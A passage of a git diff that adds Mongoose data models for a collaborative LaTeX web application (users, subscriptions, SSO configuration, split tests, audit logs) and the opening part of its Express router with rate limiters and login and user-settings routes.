}, + timeout: settings.apis.v1.timeout, + }, + (error, response, body) => { + let parsedBody + try { + parsedBody = JSON.parse(body) + } catch (error1) { + // log error and carry on without v1 data + error = error1 + logger.err( + { model: 'Publisher', slug: this.slug, error }, + '[fetchV1DataError]' + ) + } + this.name = parsedBody != null ? parsedBody.name : undefined + this.partner = parsedBody != null ? parsedBody.partner : undefined + callback(null, this) + } + ) +}) + +exports.Publisher = mongoose.model('Publisher', PublisherSchema) +exports.PublisherSchema = PublisherSchema diff --git a/services/web/app/src/models/SSOConfig.js b/services/web/app/src/models/SSOConfig.js new file mode 100644 index 0000000..5d50d51 --- /dev/null +++ b/services/web/app/src/models/SSOConfig.js @@ -0,0 +1,22 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SSOConfigSchema = new Schema( + { + entryPoint: { type: String, required: true }, + certificates: { type: Array, default: [''], required: true }, + userIdAttribute: { type: String, required: true }, + userFirstNameAttribute: { type: String }, + userLastNameAttribute: { type: String }, + validated: { type: Boolean, default: false }, + enabled: { type: Boolean, default: false }, + }, + + { + collection: 'ssoConfigs', + minimize: false, + } +) + +exports.SSOConfig = mongoose.model('SSOConfig', SSOConfigSchema) +exports.SSOConfigSchema = SSOConfigSchema diff --git a/services/web/app/src/models/SamlCache.js b/services/web/app/src/models/SamlCache.js new file mode 100644 index 0000000..185fe61 --- /dev/null +++ b/services/web/app/src/models/SamlCache.js @@ -0,0 +1,16 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SamlCacheSchema = new Schema( + { + createdAt: { type: Date }, + requestId: { type: String }, + }, + { + collection: 'samlCache', + minimize: false, + } +) + +exports.SamlCache = mongoose.model('SamlCache', SamlCacheSchema) +exports.SamlCacheSchema = SamlCacheSchema diff --git a/services/web/app/src/models/SamlLog.js b/services/web/app/src/models/SamlLog.js new file mode 100644 index 0000000..5288977 --- /dev/null +++ b/services/web/app/src/models/SamlLog.js @@ -0,0 +1,22 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const SamlLogSchema = new Schema( + { + createdAt: { type: Date, default: () => new Date() }, + data: { type: Object }, + jsonData: { type: String }, + path: { type: String }, + providerId: { type: String, default: '' }, + samlAssertion: { type: String }, + sessionId: { type: String, default: '' }, + userId: { type: String, default: '' }, + }, + { + collection: 'samlLogs', + minimize: false, + } +) + +exports.SamlLog = mongoose.model('SamlLog', SamlLogSchema) +exports.SamlLogSchema = SamlLogSchema diff --git a/services/web/app/src/models/ScriptLog.mjs b/services/web/app/src/models/ScriptLog.mjs new file mode 100644 index 0000000..9cc6b86 --- /dev/null +++ b/services/web/app/src/models/ScriptLog.mjs @@ -0,0 +1,27 @@ +import Mongoose from '../infrastructure/Mongoose.js' + +export const ScriptLogSchema = new Mongoose.Schema( + { + canonicalName: { type: String, required: true }, + filePathAtVersion: { type: String, required: true }, + imageVersion: { type: String, required: true }, + podName: { type: String, required: true }, + startTime: { type: Date, default: Date.now }, + endTime: { type: Date, default: null }, + username: { type: String, required: true }, + status: { + type: String, + enum: ['pending', 'success', 'error'], + default: 'pending', + required: true, + }, + vars: { type: Object, required: true }, + progressLogs: { + type: [{ timestamp: Date, message: String }], + required: true, + }, + }, + { minimize: false, collection: 'scriptLogs' } +) + +export const ScriptLog = Mongoose.model('ScriptLog', ScriptLogSchema) diff --git a/services/web/app/src/models/SplitTest.js b/services/web/app/src/models/SplitTest.js new file mode 100644 index 0000000..2168db4 --- /dev/null +++ b/services/web/app/src/models/SplitTest.js @@ -0,0 +1,174 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose +const { ObjectId } = Schema + +const MIN_NAME_LENGTH = 3 +const MAX_NAME_LENGTH = 200 +const MIN_VARIANT_NAME_LENGTH = 3 +const MAX_VARIANT_NAME_LENGTH = 255 +const NAME_REGEX = /^[a-z0-9-]+$/ + +const RolloutPercentType = { + type: Number, + default: 0, + min: [0, 'Rollout percentage must be between 0 and 100, got {VALUE}'], + max: [100, 'Rollout percentage must be between 0 and 100, got {VALUE}'], + required: true, +} + +const BadgeSchema = new Schema( + { + tooltipText: { + type: String, + required: false, + }, + url: { + type: String, + required: false, + }, + }, + { _id: false } +) + +const BadgeInfoSchema = new Schema( + { + alpha: BadgeSchema, + beta: BadgeSchema, + release: BadgeSchema, + }, + { _id: false } +) + +const VariantSchema = new Schema( + { + name: { + type: String, + minLength: MIN_VARIANT_NAME_LENGTH, + maxLength: MAX_VARIANT_NAME_LENGTH, + required: true, + validate: { + validator: function (input) { + return input !== null && input !== 'default' && NAME_REGEX.test(input) + }, + message: `invalid, cannot be 'default' and must match: ${NAME_REGEX}, got {VALUE}`, + }, + }, + rolloutPercent: RolloutPercentType, + rolloutStripes: [ + { + start: RolloutPercentType, + end: RolloutPercentType, + }, + ], + }, + { _id: false } +) + +const VersionSchema = new Schema( + { + versionNumber: { + type: Number, + default: 1, + min: [1, 'must be 1 or higher, got {VALUE}'], + required: true, + }, + phase: { + type: String, + default: 'alpha', + enum: ['alpha', 'beta', 'release'], + required: true, + }, + active: { + type: Boolean, + default: true, + required: true, + }, + analyticsEnabled: { + type: Boolean, + default: true, + required: true, + }, + variants: [VariantSchema], + createdAt: { + type: Date, + default: Date.now, + }, + author: { type: ObjectId, ref: 'User' }, + comment: { + type: String, + required: false, + }, + }, + { _id: false } +) + +const SplitTestSchema = new Schema( + { + name: { + type: String, + minLength: MIN_NAME_LENGTH, + maxlength: MAX_NAME_LENGTH, + required: true, + unique: true, + validate: { + validator: function (input) { + return input !== null && NAME_REGEX.test(input) + }, + message: `invalid, must match: ${NAME_REGEX}`, + }, + }, + versions: [VersionSchema], + forbidReleasePhase: { + type: Boolean, + required: false, + }, + description: { + type: String, + required: false, + }, + expectedEndDate: { + type: Date, + required: false, + }, + requiredCohortSize: { + type: Number, + required: false, + }, + expectedUplift: { + type: Number, + required: false, + }, + ticketUrl: { + type: String, + required: false, + }, + reportsUrls: { + type: [String], + required: false, + default: [], + }, + winningVariant: { + type: String, + required: false, + }, + archived: { + type: Boolean, + required: false, + }, + archivedAt: { + type: Date, + required: false, + }, + archivedBy: { type: ObjectId, ref: 'User' }, + badgeInfo: { + type: BadgeInfoSchema, + required: false, + }, + }, + { minimize: false } +) + +module.exports = { + SplitTest: mongoose.model('SplitTest', SplitTestSchema), + SplitTestSchema, +} diff --git a/services/web/app/src/models/Subscription.js b/services/web/app/src/models/Subscription.js new file mode 100644 index 0000000..0145eb6 --- /dev/null +++ b/services/web/app/src/models/Subscription.js @@ -0,0 +1,102 @@ +const mongoose = require('../infrastructure/Mongoose') +const { TeamInviteSchema } = require('./TeamInvite') + +const { Schema } = mongoose +const { ObjectId } = Schema + +const SubscriptionSchema = new Schema( + { + admin_id: { + type: ObjectId, + ref: 'User', + index: { unique: true, dropDups: true }, + }, + manager_ids: { + type: [ObjectId], + ref: 'User', + required: true, + validate: function (managers) { + // require at least one manager + return !!managers.length + }, + }, + member_ids: [{ type: ObjectId, ref: 'User' }], + groupPolicy: { type: ObjectId, ref: 'GroupPolicy' }, + invited_emails: [String], + teamInvites: [TeamInviteSchema], + recurlySubscription_id: String, + teamName: { type: String }, + teamNotice: { type: String }, + planCode: { type: String }, + groupPlan: { type: Boolean, default: false }, + managedUsersEnabled: { type: Boolean, default: false }, + membersLimit: { type: Number, default: 0 }, + customAccount: Boolean, + features: { + managedUsers: { type: Boolean, default: true }, + groupSSO: { type: Boolean, default: true }, + }, + addOns: Schema.Types.Mixed, + overleaf: { + id: { + type: Number, + index: { + unique: true, + partialFilterExpression: { 'overleaf.id': { $exists: true } }, + }, + }, + }, + recurlyStatus: { + state: { + type: String, + }, + trialStartedAt: { + type: Date, + }, + trialEndsAt: { + type: Date, + }, + }, + paymentProvider: { + service: { + type: String, + }, + subscriptionId: { + type: String, + }, + }, + collectionMethod: { + type: String, + enum: ['automatic', 'manual'], + default: 'automatic', + }, + v1_id: { + type: Number, + required: false, + min: 1, + }, + salesforce_id: { + type: String, + required: false, + validate: { + validator: function (salesforceId) { + return ( + salesforceId == null || + salesforceId === '' || + salesforceId.match(/^(?:[A-Za-z0-9]{15}|[A-Za-z0-9]{18})$/) + ) + }, + }, + }, + ssoConfig: { type: ObjectId, ref: 'SSOConfig' }, + }, + { minimize: false } +) + +// Subscriptions have no v1 data to fetch +SubscriptionSchema.method('fetchV1Data', function (callback) { + callback(null, this) +}) + +exports.Subscription = mongoose.model('Subscription', SubscriptionSchema) +exports.SubscriptionSchema = SubscriptionSchema diff --git a/services/web/app/src/models/Survey.js b/services/web/app/src/models/Survey.js new file mode 100644 index 0000000..5d56a20 --- /dev/null +++ b/services/web/app/src/models/Survey.js @@ -0,0 +1,54 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const MIN_NAME_LENGTH = 3 +const MAX_NAME_LENGTH = 200 +const NAME_REGEX = /^[a-z0-9-]+$/ + +const SurveySchema = new Schema( + { + name: { + type: String, + minLength: MIN_NAME_LENGTH, + maxlength: MAX_NAME_LENGTH, + required: true, + validate: { + validator: function (input) { + return input !== null && NAME_REGEX.test(input) + }, + message: `invalid, must match: ${NAME_REGEX}`, + }, + }, + preText: { + type: String, + required: true, + }, + linkText: { + type: String, + required: true, + }, + url: { + type: String, + required: true, + }, + options: { + hasRecurlyGroupSubscription: { + type: Boolean, + default: false, + }, + rolloutPercentage: { + type: Number, + default: 100, + }, + }, + }, + { + collection: 'surveys', + minimize: false, + } +) + +module.exports = { + Survey: mongoose.model('Survey', SurveySchema), + SurveySchema, +} diff --git a/services/web/app/src/models/SystemMessage.js b/services/web/app/src/models/SystemMessage.js new file mode 100644 index 0000000..c3e37d0 --- /dev/null +++ b/services/web/app/src/models/SystemMessage.js @@ -0,0 +1,12 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const SystemMessageSchema = new Schema( + { + content: { type: String, default: '' }, + }, + { minimize: false } +) + +exports.SystemMessage = mongoose.model('SystemMessage', SystemMessageSchema) diff --git a/services/web/app/src/models/Tag.js b/services/web/app/src/models/Tag.js new file mode 100644 index 0000000..8e0eb11 --- /dev/null +++ b/services/web/app/src/models/Tag.js @@ -0,0 +1,28 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const COLOR_REGEX = /^#[a-fA-F0-9]{6}$/ + +// Note that for legacy reasons, user_id and project_ids are plain strings, +// not ObjectIds. + +const TagSchema = new Schema( + { + user_id: { type: String, required: true }, + name: { type: String, required: true }, + color: { + type: String, + validate: { + validator: function (v) { + return !v || COLOR_REGEX.test(v) + }, + message: 'Provided color code is invalid.', + }, + }, + project_ids: [String], + }, + { minimize: false } +) + +exports.Tag = mongoose.model('Tag', TagSchema) +exports.TagSchema = TagSchema diff --git a/services/web/app/src/models/TeamInvite.js b/services/web/app/src/models/TeamInvite.js new file mode 100644 index 0000000..b115d27 --- /dev/null +++ b/services/web/app/src/models/TeamInvite.js @@ -0,0 +1,16 @@ +const mongoose = require('../infrastructure/Mongoose') + +const { Schema } = mongoose + +const TeamInviteSchema = new Schema( + { + email: { type: String, required: true }, + token: { type: String }, + inviterName: { type: String }, + sentAt: { type: Date }, + }, + { minimize: false } +) + +exports.TeamInvite = mongoose.model('TeamInvite', TeamInviteSchema) +exports.TeamInviteSchema = TeamInviteSchema diff --git a/services/web/app/src/models/User.js b/services/web/app/src/models/User.js new file mode 100644 index 0000000..c63647e --- /dev/null +++ b/services/web/app/src/models/User.js @@ -0,0 +1,245 @@ +const Settings = require('@overleaf/settings') +const mongoose = require('../infrastructure/Mongoose') +const TokenGenerator = require('../Features/TokenGenerator/TokenGenerator') +const { Schema } = mongoose +const { ObjectId } = Schema + +// See https://stackoverflow.com/questions/386294/what-is-the-maximum-length-of-a-valid-email-address/574698#574698 +const MAX_EMAIL_LENGTH = 254 +const MAX_NAME_LENGTH = 255 + +const UserSchema = new Schema( + { + email: { type: String, default: '', maxlength: MAX_EMAIL_LENGTH }, + emails: [ + { + email: { type: String, default: '', maxlength: MAX_EMAIL_LENGTH }, + reversedHostname: { type: String, default: '' }, + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + confirmedAt: { type: Date }, + samlProviderId: { type: String }, + affiliationUnchecked: { type: Boolean }, + reconfirmedAt: { type: Date }, + }, + ], + first_name: { + type: String, + default: '', + maxlength: MAX_NAME_LENGTH, + }, + last_name: { + type: String, + default: '', + maxlength: MAX_NAME_LENGTH, + }, + role: { type: String, default: '' }, + institution: { type: String, default: '' }, + hashedPassword: String, + enrollment: { + sso: [ + { + groupId: { + type: ObjectId, + ref: 'Subscription', + }, + linkedAt: Date, + primary: { type: Boolean, default: false }, + }, + ], + managedBy: { + type: ObjectId, + ref: 'Subscription', + }, + enrolledAt: { type: Date }, + }, + isAdmin: { type: Boolean, default: false }, + staffAccess: { + publisherMetrics: { type: Boolean, default: false }, + publisherManagement: { type: Boolean, default: false }, + institutionMetrics: { type: Boolean, default: false }, + institutionManagement: { type: Boolean, default: false }, + groupMetrics: { type: Boolean, default: false }, + groupManagement: { type: Boolean, default: false }, + adminMetrics: { type: Boolean, default: false }, + splitTestMetrics: { type: Boolean, default: false }, + splitTestManagement: { type: Boolean, default: false }, + }, + signUpDate: { + type: Date, + default() { + return new Date() + }, + }, + loginEpoch: { type: Number }, + lastActive: { type: Date }, + lastFailedLogin: { type: Date }, + lastLoggedIn: { type: Date }, + lastLoginIp: { type: String, default: '' }, + lastPrimaryEmailCheck: { type: Date }, + lastTrial: { type: Date }, + loginCount: { type: Number, default: 0 }, + holdingAccount: { type: Boolean, default: false }, + ace: { + mode: { type: String, default: 'none' }, + theme: { type: String, default: 'textmate' }, + overallTheme: { type: String, default: '' }, + fontSize: { type: Number, default: '12' }, + autoComplete: { type: Boolean, default: true }, + autoPairDelimiters: { type: Boolean, default: true }, + spellCheckLanguage: { type: String, default: 'en' }, + pdfViewer: { type: String, default: 'pdfjs' }, + syntaxValidation: { type: Boolean }, + fontFamily: { type: String }, + lineHeight: { type: String }, + mathPreview: { type: Boolean, default: true }, + referencesSearchMode: { type: String, default: 'advanced' }, // 'advanced' or 'simple' + enableNewEditor: { type: Boolean }, + }, + features: { + collaborators: { + type: Number, + default: Settings.defaultFeatures.collaborators, + }, + versioning: { + type: Boolean, + default: Settings.defaultFeatures.versioning, + }, + dropbox: { type: Boolean, default: Settings.defaultFeatures.dropbox }, + github: { type: Boolean, default: Settings.defaultFeatures.github }, + gitBridge: { type: Boolean, default: Settings.defaultFeatures.gitBridge }, + compileTimeout: { + type: Number, + default: Settings.defaultFeatures.compileTimeout, + }, + compileGroup: { + type: String, + default: Settings.defaultFeatures.compileGroup, + }, + references: { + type: Boolean, + default: Settings.defaultFeatures.references, + }, + trackChanges: { + type: Boolean, + default: Settings.defaultFeatures.trackChanges, + }, + mendeley: { type: Boolean, default: Settings.defaultFeatures.mendeley }, + zotero: { type: Boolean, default: Settings.defaultFeatures.zotero }, + papers: { type: Boolean, default: Settings.defaultFeatures.papers }, + referencesSearch: { + type: Boolean, + default: Settings.defaultFeatures.referencesSearch, + }, + symbolPalette: { + type: Boolean, + default: Settings.defaultFeatures.symbolPalette, + }, + aiErrorAssistant: { + type: Boolean, + default: false, + }, + }, + featuresOverrides: [ + { + createdAt: { + type: Date, + default() { + return new Date() + }, + }, + expiresAt: { type: Date }, + note: { type: String }, + features: { + aiErrorAssistant: { type: Boolean }, + collaborators: { type: Number }, + versioning: { type: Boolean }, + dropbox: { type: Boolean }, + github: { type: Boolean }, + gitBridge: { type: Boolean }, + compileTimeout: { type: Number }, + compileGroup: { type: String }, + templates: { type: Boolean }, + trackChanges: { type: Boolean }, + mendeley: { type: Boolean }, + papers: { type: Boolean }, + zotero: { type: Boolean }, + referencesSearch: { type: Boolean }, + symbolPalette: { type: Boolean }, + }, + }, + ], + featuresUpdatedAt: { type: Date }, + featuresEpoch: { + type: String, + }, + must_reconfirm: { type: Boolean, default: false }, + referal_id: { + type: String, + default() { + return TokenGenerator.generateReferralId() + }, + }, + refered_users: [{ type: ObjectId, ref: 'User' }], + refered_user_count: { type: Number, default: 0 }, + refProviders: { + // The actual values are managed by third-party-references. + mendeley: Schema.Types.Mixed, + zotero: Schema.Types.Mixed, + papers: Schema.Types.Mixed, + }, + writefull: { + enabled: { type: Boolean, default: null }, + autoCreatedAccount: { type: Boolean, default: false }, + isPremium: { type: Boolean, default: false }, + }, + aiErrorAssistant: { + enabled: { type: Boolean, default: true }, + }, + alphaProgram: { type: Boolean, default: false }, // experimental features + betaProgram: { type: Boolean, default: false }, + labsProgram: { type: Boolean, default: false }, + labsExperiments: { type: Array, default: [] }, + overleaf: { + id: { type: Number }, + accessToken: { type: String }, + refreshToken: { type: String }, + }, + awareOfV2: { type: Boolean, default: false }, + samlIdentifiers: { type: Array, default: [] }, + thirdPartyIdentifiers: { type: Array, default: [] }, + migratedAt: { type: Date }, + twoFactorAuthentication: { + createdAt: { type: Date }, + enrolledAt: { type: Date }, + secretEncrypted: { type: String }, + }, + onboardingEmailSentAt: { type: Date }, + splitTests: Schema.Types.Mixed, + analyticsId: { type: String }, + completedTutorials: Schema.Types.Mixed, + suspended: { type: Boolean }, + }, + { minimize: false } +) + +function formatSplitTestsSchema(next) { + if (this.splitTests) { + for (const splitTestKey of Object.keys(this.splitTests)) { + for (const variantIndex in this.splitTests[splitTestKey]) { + this.splitTests[splitTestKey][variantIndex].assignedAt = new Date( + this.splitTests[splitTestKey][variantIndex].assignedAt + ) + } + } + } + next() +} +UserSchema.pre('save', formatSplitTestsSchema) + +exports.User = mongoose.model('User', UserSchema) +exports.UserSchema = UserSchema diff --git a/services/web/app/src/models/UserAuditLogEntry.js b/services/web/app/src/models/UserAuditLogEntry.js new file mode 100644 index 0000000..c4355d2 --- /dev/null +++ b/services/web/app/src/models/UserAuditLogEntry.js @@ -0,0 +1,23 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const UserAuditLogEntrySchema = new Schema( + { + userId: { type: Schema.Types.ObjectId, index: true }, + info: { type: Object }, + initiatorId: { type: Schema.Types.ObjectId }, + ipAddress: { type: String }, + operation: { type: String }, + timestamp: { type: Date, default: Date.now }, + }, + { + collection: 'userAuditLogEntries', + minimize: false, + } +) + +exports.UserAuditLogEntry = mongoose.model( + 'UserAuditLogEntry', + UserAuditLogEntrySchema +) +exports.UserAuditLogEntrySchema = UserAuditLogEntrySchema diff --git a/services/web/app/src/models/UserFeatureUsage.js b/services/web/app/src/models/UserFeatureUsage.js new file mode 100644 index 0000000..9ba2848 --- /dev/null +++ b/services/web/app/src/models/UserFeatureUsage.js @@ -0,0 +1,20 @@ +const mongoose = require('../infrastructure/Mongoose') +const { Schema } = mongoose + +const Usage = new Schema({ + usage: { type: Number }, + periodStart: { type: Date }, +}) + +const UserFeatureUsageSchema = new Schema({ + features: { + aiErrorAssistant: Usage, + }, +}) + +exports.UserFeatureUsage = mongoose.model( + 'UserFeatureUsage', + UserFeatureUsageSchema +) + +exports.UserFeatureUsageSchema = UserFeatureUsageSchema diff --git a/services/web/app/src/router.mjs b/services/web/app/src/router.mjs new file mode 100644 index 0000000..5e1a21c --- /dev/null +++ b/services/web/app/src/router.mjs @@ -0,0 +1,1266 @@ +import AdminController from './Features/ServerAdmin/AdminController.js' +import ErrorController from './Features/Errors/ErrorController.js' +import Features from './infrastructure/Features.js' +import ProjectController from './Features/Project/ProjectController.js' +import ProjectApiController from './Features/Project/ProjectApiController.mjs' +import ProjectListController from './Features/Project/ProjectListController.mjs' +import SpellingController from './Features/Spelling/SpellingController.mjs' +import EditorRouter from './Features/Editor/EditorRouter.mjs' +import Settings from '@overleaf/settings' +import TpdsController from './Features/ThirdPartyDataStore/TpdsController.mjs' +import SubscriptionRouter from './Features/Subscription/SubscriptionRouter.mjs' +import UploadsRouter from './Features/Uploads/UploadsRouter.mjs' +import metrics from '@overleaf/metrics' +import ReferalController from './Features/Referal/ReferalController.mjs' +import AuthenticationController from './Features/Authentication/AuthenticationController.js' +import PermissionsController from './Features/Authorization/PermissionsController.js' +import SessionManager from './Features/Authentication/SessionManager.js' +import TagsController from './Features/Tags/TagsController.mjs' +import NotificationsController from './Features/Notifications/NotificationsController.mjs' +import CollaboratorsRouter from './Features/Collaborators/CollaboratorsRouter.mjs' +import UserInfoController from './Features/User/UserInfoController.js' +import UserController from './Features/User/UserController.js' +import UserEmailsController from './Features/User/UserEmailsController.js' +import UserPagesController from './Features/User/UserPagesController.mjs' +import TutorialController from './Features/Tutorial/TutorialController.mjs' +import DocumentController from './Features/Documents/DocumentController.mjs' +import CompileManager from './Features/Compile/CompileManager.js' +import CompileController from './Features/Compile/CompileController.js' +import ClsiCookieManagerFactory from './Features/Compile/ClsiCookieManager.js' +import HealthCheckController from './Features/HealthCheck/HealthCheckController.mjs' +import ProjectDownloadsController from './Features/Downloads/ProjectDownloadsController.mjs' +import FileStoreController from './Features/FileStore/FileStoreController.mjs' +import DocumentUpdaterController from './Features/DocumentUpdater/DocumentUpdaterController.mjs' +import HistoryRouter from './Features/History/HistoryRouter.mjs' +import ExportsController from './Features/Exports/ExportsController.mjs' +import PasswordResetRouter from './Features/PasswordReset/PasswordResetRouter.mjs' +import StaticPagesRouter from './Features/StaticPages/StaticPagesRouter.mjs' +import ChatController from './Features/Chat/ChatController.js' +import Modules from './infrastructure/Modules.js' +import { + RateLimiter, + openProjectRateLimiter, + overleafLoginRateLimiter, +} from './infrastructure/RateLimiter.js' +import RateLimiterMiddleware from './Features/Security/RateLimiterMiddleware.js' +import InactiveProjectController from './Features/InactiveData/InactiveProjectController.mjs' +import ContactRouter from './Features/Contacts/ContactRouter.mjs' +import ReferencesController from './Features/References/ReferencesController.mjs' +import AuthorizationMiddleware from './Features/Authorization/AuthorizationMiddleware.js' +import BetaProgramController from './Features/BetaProgram/BetaProgramController.mjs' +import AnalyticsRouter from './Features/Analytics/AnalyticsRouter.mjs' +import MetaController from './Features/Metadata/MetaController.mjs' +import TokenAccessController from './Features/TokenAccess/TokenAccessController.mjs' +import TokenAccessRouter from './Features/TokenAccess/TokenAccessRouter.mjs' +import LinkedFilesRouter from './Features/LinkedFiles/LinkedFilesRouter.mjs' +import TemplatesRouter from './Features/Templates/TemplatesRouter.js' +import UserMembershipRouter from './Features/UserMembership/UserMembershipRouter.mjs' +import SystemMessageController from './Features/SystemMessages/SystemMessageController.js' +import AnalyticsRegistrationSourceMiddleware from './Features/Analytics/AnalyticsRegistrationSourceMiddleware.js' +import AnalyticsUTMTrackingMiddleware from './Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs' +import CaptchaMiddleware from './Features/Captcha/CaptchaMiddleware.js' +import { Joi, validate } from './infrastructure/Validation.js' +import UnsupportedBrowserMiddleware from './infrastructure/UnsupportedBrowserMiddleware.js' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { plainTextResponse } from './infrastructure/Response.js' +import PublicAccessLevels from './Features/Authorization/PublicAccessLevels.js' +import SocketDiagnostics from './Features/SocketDiagnostics/SocketDiagnostics.mjs' +import ClsiCacheController from './Features/Compile/ClsiCacheController.js' +const ClsiCookieManager = ClsiCookieManagerFactory( + Settings.apis.clsi != null ? Settings.apis.clsi.backendGroupName : undefined +) +const { renderUnsupportedBrowserPage, unsupportedBrowserMiddleware } = + UnsupportedBrowserMiddleware + +const rateLimiters = { + addEmail: new RateLimiter('add-email', { + points: 10, + duration: 60, + }), + addProjectToTag: new RateLimiter('add-project-to-tag', { + points: 30, + duration: 60, + }), + addProjectsToTag: new RateLimiter('add-projects-to-tag', { + points: 30, + duration: 60, + }), + canSkipCaptcha: new RateLimiter('can-skip-captcha', { + points: 20, + duration: 60, + }), + changePassword: new RateLimiter('change-password', { + points: 10, + duration: 60, + }), + compileProjectHttp: new RateLimiter('compile-project-http', { + points: 800, + duration: 60 * 60, + }), + confirmEmail: new RateLimiter('confirm-email', { + points: 10, + duration: 60, + }), + createProject: new RateLimiter('create-project', { + points: 20, + duration: 60, + }), + createTag: new RateLimiter('create-tag', { + points: 30, + duration: 60, + }), + deleteEmail: new RateLimiter('delete-email', { + points: 10, + duration: 60, + }), + deleteTag: new RateLimiter('delete-tag', { + points: 30, + duration: 60, + }), + deleteUser: new RateLimiter('delete-user', { + points: 10, + duration: 60, + }), + endorseEmail: new RateLimiter('endorse-email', { + points: 30, + duration: 60, + }), + getProjects: new RateLimiter('get-projects', { + points: 30, + duration: 60, + }), + grantTokenAccessReadOnly: new RateLimiter('grant-token-access-read-only', { + points: 10, + duration: 60, + }), + grantTokenAccessReadWrite: new RateLimiter('grant-token-access-read-write', { + points: 10, + duration: 60, + }), + indexAllProjectReferences: new RateLimiter('index-all-project-references', { + points: 30, + duration: 60, + }), + miscOutputDownload: new RateLimiter('misc-output-download', { + points: 1000, + duration: 60 * 60, + }), + multipleProjectsZipDownload: new RateLimiter( + 'multiple-projects-zip-download', + { + points: 10, + duration: 60, + } + ), + openDashboard: new RateLimiter('open-dashboard', { + points: 30, + duration: 60, + }), + readAndWriteToken: new RateLimiter('read-and-write-token', { + points: 15, + duration: 60, + }), + readOnlyToken: new RateLimiter('read-only-token', { + points: 15, + duration: 60, + }), + removeProjectFromTag: new RateLimiter('remove-project-from-tag', { + points: 30, + duration: 60, + }), + removeProjectsFromTag: new RateLimiter('remove-projects-from-tag', { + points: 30, + duration: 60, + }), + renameTag: new RateLimiter('rename-tag', { + points: 30, + duration: 60, + }), + resendConfirmation: new RateLimiter('resend-confirmation', { + points: 1, + duration: 60, + }), + sendConfirmation: new RateLimiter('send-confirmation', { + points: 1, + duration: 60, + }), + sendChatMessage: new RateLimiter('send-chat-message', { + points: 100, + duration: 60, + }), + statusCompiler: new RateLimiter('status-compiler', { + points: 10, + duration: 60, + }), + zipDownload: new RateLimiter('zip-download', { + points: 10, + duration: 60, + }), +} + +async function initialize(webRouter, privateApiRouter, publicApiRouter) { + webRouter.use(unsupportedBrowserMiddleware) + + if (!Settings.allowPublicAccess) { + webRouter.all('*', AuthenticationController.requireGlobalLogin) + } + + webRouter.get('*', AnalyticsRegistrationSourceMiddleware.setInbound()) + webRouter.get('*', AnalyticsUTMTrackingMiddleware.recordUTMTags()) + + // Mount onto /login in order to get the deviceHistory cookie. + webRouter.post( + '/login/can-skip-captcha', + // Keep in sync with the overleaf-login options. + RateLimiterMiddleware.rateLimit(rateLimiters.canSkipCaptcha), + CaptchaMiddleware.canSkipCaptcha + ) + + webRouter.get('/login', UserPagesController.loginPage) + AuthenticationController.addEndpointToLoginWhitelist('/login') + + webRouter.post( + '/login', + RateLimiterMiddleware.rateLimit(overleafLoginRateLimiter), // rate limit IP (20 / 60s) + RateLimiterMiddleware.loginRateLimitEmail(), // rate limit email (10 / 120s) + CaptchaMiddleware.validateCaptcha('login'), + AuthenticationController.passportLogin + ) + + webRouter.get( + '/compromised-password', + AuthenticationController.requireLogin(), + UserPagesController.compromisedPasswordPage + ) + + webRouter.get('/account-suspended', UserPagesController.accountSuspended) + + webRouter.get( + '/socket-diagnostics', + AuthenticationController.requireLogin(), + SocketDiagnostics.index + ) + + if (Settings.enableLegacyLogin) { + AuthenticationController.addEndpointToLoginWhitelist('/login/legacy') + webRouter.get('/login/legacy', UserPagesController.loginPage) + webRouter.post( + '/login/legacy', + RateLimiterMiddleware.rateLimit(overleafLoginRateLimiter), // rate limit IP (20 / 60s) + RateLimiterMiddleware.loginRateLimitEmail(), // rate limit email (10 / 120s) + CaptchaMiddleware.validateCaptcha('login'), + AuthenticationController.passportLogin + ) + } + + webRouter.get( + '/read-only/one-time-login', + UserPagesController.oneTimeLoginPage + ) + AuthenticationController.addEndpointToLoginWhitelist( + '/read-only/one-time-login' + ) + + webRouter.post('/logout', UserController.logout) + + webRouter.get('/restricted', AuthorizationMiddleware.restricted) + + if (Features.hasFeature('registration-page')) { + webRouter.get('/register', UserPagesController.registerPage) + AuthenticationController.addEndpointToLoginWhitelist('/register') + } + + EditorRouter.apply(webRouter, privateApiRouter) + CollaboratorsRouter.apply(webRouter, privateApiRouter) + SubscriptionRouter.apply(webRouter, privateApiRouter, publicApiRouter) + UploadsRouter.apply(webRouter, privateApiRouter) + PasswordResetRouter.apply(webRouter, privateApiRouter) + StaticPagesRouter.apply(webRouter, privateApiRouter) + ContactRouter.apply(webRouter, privateApiRouter) + AnalyticsRouter.apply(webRouter, privateApiRouter, publicApiRouter) + LinkedFilesRouter.apply(webRouter, privateApiRouter, publicApiRouter) + TemplatesRouter.apply(webRouter) + UserMembershipRouter.apply(webRouter) + TokenAccessRouter.apply(webRouter) + HistoryRouter.apply(webRouter, privateApiRouter) + + await Modules.applyRouter(webRouter, privateApiRouter, publicApiRouter) + + if (Settings.enableSubscriptions) { + webRouter.get( + '/user/bonus', + AuthenticationController.requireLogin(), + ReferalController.bonus + ) + } + + // .getMessages will generate an empty response for anonymous users. + webRouter.get('/system/messages', SystemMessageController.getMessages) + + webRouter.get( + '/user/settings', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + UserPagesController.settingsPage + ) + webRouter.post( + '/user/settings', + AuthenticationController.requireLogin(), + validate({ + body: Joi.object({ + first_name: Joi.string().allow(null, '').max(255), + last_name: Joi.string().allow(null, '').max(255), + }).unknown(), + }), + UserController.updateUserSettings + ) + webRouter.post( + '/user/password/update', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.changePassword), + PermissionsController.requirePermission('change-password'), + UserController.changePassword + ) + webRouter.get( + '/user/emails', + AuthenticationController.requireLogin(), + PermissionsController.useCapabilities(), + UserController.ensureAffiliationMiddleware, + UserEmailsController.list + ) + webRouter.get( + '/user/emails/confirm', + AuthenticationController.requireLogin(), + UserEmailsController.showConfirm + ) + 